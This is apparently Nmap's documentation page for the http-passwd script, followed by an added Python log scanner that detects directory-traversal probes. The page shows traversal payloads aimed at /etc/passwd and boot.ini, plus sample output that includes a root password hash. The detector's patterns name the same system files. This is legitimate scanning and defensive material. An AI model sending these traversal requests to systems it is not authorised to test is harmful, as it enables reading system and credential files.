File http-passwd
Download: http://nmap.org/svn/scripts/http-passwd.nse
User Summary
Checks if a web server is vulnerable to directory traversal by attempting to
retrieve /etc/passwd or \boot.ini using various traversal methods such as
requesting ../../../../etc/passwd.
Script Arguments
http-max-cache-size, http.useragent, pipeline
See the documentation for the http library.
Example Usage
nmap -sV --script=http-passwd <target>
Script Output
80/tcp open http
| http-passwd: Directory traversal found.
| Payload: "index.html?../../../../../boot.ini"
| Printing first 250 bytes:
| [boot loader]
| timeout=30
| default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
| [operating systems]
|_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

80/tcp open http
| http-passwd: Directory traversal found.
| Payload: "../../../../../../../../../../etc/passwd"
| Printing first 250 bytes:
| root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh
| sshd:*:65532:65534::/:/bin/false
| ftp:*:65533:65534::/:/bin/false
|_nobody:*:65534:65534::/:/bin/false
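A defender-side check for the request patterns shown in the output above, as an added example that is not part of the Nmap script or its documentation: it scans access-log lines for traversal requests that name /etc/passwd or boot.ini and reports the response status. The log format (combined log format), the sample lines, and the handling of percent-encoded and backslash variants are assumptions that go beyond the plain ../ form the page shows.

```python
import re
from urllib.parse import unquote

# Files this page names as the traversal targets.
TARGETS = ("etc/passwd", "boot.ini")
# Request field of a combined-log-format line, plus the status code after it.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+" (\d{3})')

def normalize(target, max_rounds=3):
    """Percent-decode repeatedly (catches double encoding), unify slashes."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target.replace("\\", "/").lower()

def is_traversal_probe(target):
    """True if the request climbs directories AND names a target file."""
    norm = normalize(target)
    return "../" in norm and any(name in norm for name in TARGETS)

def scan(lines):
    """Return (client_ip, raw_target, status) for each matching log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and is_traversal_probe(m.group(1)):
            hits.append((line.split()[0], m.group(1), int(m.group(2))))
    return hits

# Constructed sample log lines (addresses are from documentation ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html?../../../../../boot.ini HTTP/1.1" 200 211',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /../../../../../../../../../../etc/passwd HTTP/1.1" 404 0',
    '198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 400 0',
    '198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /%252e%252e%255c%252e%252e%255cboot.ini HTTP/1.1" 404 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /docs/etc/passwd-policy.html HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, target, status in scan(SAMPLE_LOG):
        # A 200 on a traversal request means the file may have been served.
        flag = "REVIEW RESPONSE" if status == 200 else "probe"
        print(f"{ip} {status} {flag} {target}")
```

Hits answered with status 200 are the ones to triage first, since the script reports a finding only when the server actually returns the file.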
Requires
Author: Kris Katterjohn, Ange Gutek
License: Same as Nmap--See http://nmap.org/book/man-legal.html




